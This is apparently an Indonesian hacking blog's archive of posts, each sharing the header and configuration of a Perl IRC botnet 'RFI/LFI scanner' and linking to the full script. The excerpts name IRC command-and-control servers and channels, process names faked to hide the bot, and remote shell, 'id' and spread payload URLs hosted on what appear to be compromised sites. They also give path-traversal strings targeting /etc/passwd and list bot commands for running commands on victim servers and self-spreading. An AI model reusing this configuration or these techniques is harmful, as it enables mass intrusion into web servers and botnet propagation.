Showing posts with label Rfi Scanner. Show all posts
Showing posts with label Rfi Scanner. Show all posts

Thursday, 8 July 2010

e107 New Scanner ByroeNet

#!/usr/bin/perl
$powered="ByroeNet";
$mail="admin(at)byroe.net";
#######################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.kill-9.server.or.id";
my $ircport = "6667";
my $nickname = "loveYou";
my $ident = "love";
my $channel = "#kill-9";
my $runner = "arianom";
my $fullname = 'matamu suwek';
my $lfi = "!lfi";
my $xml = "!xml";
my $e107 = "!e107";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt?";
my $byroesprd = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/pbot.txt?";

Download [lengkap +id]

Saturday, 5 June 2010

BaMbY LFI Scanner

#!/usr/bin/perl
$powered="BaMbY";
$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";


Download [Full+id]

Friday, 4 June 2010

SQL , LFI dan RFI Scanner

#!/usr/bin/perl

############################################
# VopCrew Multi Scanner v5.1 #
# ReCoded by arianom #
# kill.nines[at]gmail[dot]com #
# Copyleft © 2009 VopCrew UnderGrounD #
############################################
# perl vopcrew.txt help me !!! #
############################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;

my $fakeproc = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport = $ARGV[1];
my $nickname = $ARGV[2];
my $ident = $ARGV[3];
my $channel = '#'.$ARGV[4];
my $runner = $ARGV[5];
my $fullname = ' 15( 7@ 2VopCrew-Multi-Scanner 15) ';

my $injector = $ARGV[7];
my $phpshell = $ARGV[8];
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $mysqlcmd = '!mysql';
my $mssqlcmd = '!mssql';
my $alicmd = '!log';

$rfi_result = "v0pCr3w";
$lfi_test = "../../../../../../../../../../../../../../../etc/passwd";
$lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
$sql_test = "'";
$mysql_output = ("Query failed|Query Error|right syntax to use near");
$mssql_output = ("SQL Server error|Incorrect syntax near|syntax error converting|unclosed quotation");

my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n";
my $failed = "\n [-] perl $0 \n\n";

if (@ARGV != 9) { print $failed; exit(); } else { print $success; }

Download [Lengkap +id]


NB: Cara menggunakan > perl vopscan.txt
Nanti akan muncul Cara Penggunaan yang benar pada kolom shell anda

Thursday, 3 June 2010

RFI & LFI scanner

***************************
AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;

$|++;
#######################################################
## CONFIGURATION //
#######################################################

$auth = "arianom";
$authmail = "arianom\@live.it";

my $id = "http://nuthome.net/xe/idosyris.txt??";
my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";
my $ircd = "irc.gotakan.h4ck.la";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick

my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
number, so more speed.
my $rfipidpr0c = 50;


### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "http://www.barcamenando.it/red.txt?";
my $spreadACT = 1; #1 ->disabled, 1 ->enabled
my $securityACT = 0; #1 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode

Download[lengkap + id]

Wednesday, 13 January 2010

PittbuLL Scanner

#!/usr/bin/perl
# Release Name : XxX-SuperScan-XxX
# Author : arianom killnine
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; kiLL-9 CreW, arianom, kiLLer.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################
my $response = "http://kill-9.co.tv//arianom/response.txt?"; # included in zip as response.txt
my $test = "http://kill-9.co.tv//arianom/test.txt?"; # included in zip as test.txt
my $printcmd = "http://kill-9.co.tv//arianom/sh.txt?";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://kill-9.co.tv//arianom/spread.txt?";
my $nickname = "kiLLeR|".(int(rand(999)));
my $ident = "kiLL";
my $channel = "#kill-9";
my $server = "irc.killer.server.or.id";
my $port = 6667;
#################
#[Configuration]#
#################


Download [full + id]

Sunday, 10 January 2010

V6 Osirys

#!/usr/bin/perl

#####################################################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION //
#######################################################

$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id = "http://ciro1992.org/ciao/id.txt??"; #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.kill-9.server.or.id"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "";

my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;

#######################################################
## END OF CONFIGURATION //
#######################################################

$k= 0;
print q{
------------------------------------------------
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|

------------------------------------------------
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008

};


Download [lengkap + Id]

Friday, 8 January 2010

Bjork Scanner

!/usr/bin/perl
###############################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
###############################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="im.not.living.im.just.killing.time";
my $id="http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?";
my $spread="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my $spreads="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='irc.kamtiez.punked.us' unless $servidor;
my $porta='7000';

etc..

Download Full Scanner

Sunday, 20 December 2009

Meffy Scanner

This summary is not available. Please click here to view the post.

Albania Scanner

***************************
AUTOR: Abah_benu
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?


Download [lengkap + id]

Saturday, 19 December 2009

Rose Scanner

***************************
AUTOR: Tukulesto
DATE :December 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


###################
## CONFIGURATION ##
###################

my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";

@ircservers = (

"209.41.180.98",

#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"

);


Download [lengkap + id]

Friday, 18 December 2009

Rafly Scanner

#!/usr/bin/perl

#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);

my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";


Download [lengkap + id]

Pittbull Scanner

***************************
AUTORE: Arianom
DATE :April 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.

# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################

my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;

#################
#[Configuration]#
#################


Download [lengkap + id]

Tuesday, 15 December 2009

Bajo Sanner

***************************
AUTOR: arianom
DATE :Desember 2009
LINGUAGE: perl (.pl)
**************************

#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [lengkpa + id]

Sunday, 13 December 2009

Zell Scanner

***************************
AUTOR: ZELL
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

$process = "/usr/local/apache/bin/httpd -DSSL";
my $printcmd = "http://www.urisan.tche.br/~escola//asu/sh.txt?";
my $id = "http://www.urisan.tche.br/~escola//asu/id-vnc.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/usil-spreads.txt?";
my $ircserver = "irc.kamtiez.punked.us";
my $start = "!scan4";
my $port = "6667";
my $nickname = "kill[RFI][" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v3.0 FULL VERSION";

print "\n";
print " Priv 8 Scanner\n";
print " Author: ara";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;

Download [lengkap + id]

Saturday, 12 December 2009

Alb Scanner

***************************
AUTORE: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

#!/usr/bin/perl

$process = "/usr/sbin/ateam";
my $printcmd = "http://www.ambient-arts.co.uk/modules/sh.txt??";
my $id = "http://www.ambient-arts.co.uk/modules/id.txt??";
my $spread = "http://www.urisan.tche.br/pbotz.txt??";
my $ircserver = "209.41.180.98";
my $start = "!scan";
my $port = "8400";
my $nickname = "ALB[" . int( rand(999) ) . "]";
my $admin = "arianom","arianom";
my $channel = "#kamtiez"; ## the normal chan to scan
my $chanres = "#kamtiez"; ## the channel where u can find the results
my $verz = "Priv8 RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: SeaNet\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [lengkap + id]

Friday, 11 December 2009

Italian Scanner

***************************
AUTOR: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

# SCAN RFI V.1.0 CoDe By arianom
#--------------------------------------------
#--------------------------------------------
# L'AUTORE SI ESENTA DA QUALSIASI UTILIZZO
#--------------------------------------------
# Coyprgiht L 2008 arianom
#--------------------------------------------

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

my $linas_max='10';
my $sleep='1';
my $processo ="httpds";
my $cmd="http://www.bangkoksexy.com//generator/data/rr.txt??";
my $id="http://www.bangkoksexy.com//generator/data/glup.txt";
my $spread="http://www.bangkoksexy.com//generator/data/siri.txt";
my $server="irc.arianom.info.tm";
my $porta="8400";
my $numero=int(rand(100));
my $nick="[Private]".$numero;
my $canale="#staff";
my $verbot = "1.01";
my $stringa = "!scan";
my $adm = "arianom";
my $out = "!addio".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?


Download [lengkap + id]

Thursday, 10 December 2009

Feelcomz Scanner

***************************
AUTORE: FeeLCoMz
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

################################################
## Kill-9 RFI Scanner Bot v2.4 ##
## By arianom ##
## Copyleft July 2008 ##
## Usage: perl ht.pl ##
################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = " http://pianobarcafe.com/groups/idfx.txt";
my $shell = "http://jeannedawsonart.com/images/r57???";
my $spread = "";
#my $id = "http://pianobarcafe.com/groups/idfx.txt";
#my $shell = "http://jeannedawsonart.com/images/r57???";

download [lengkap + id]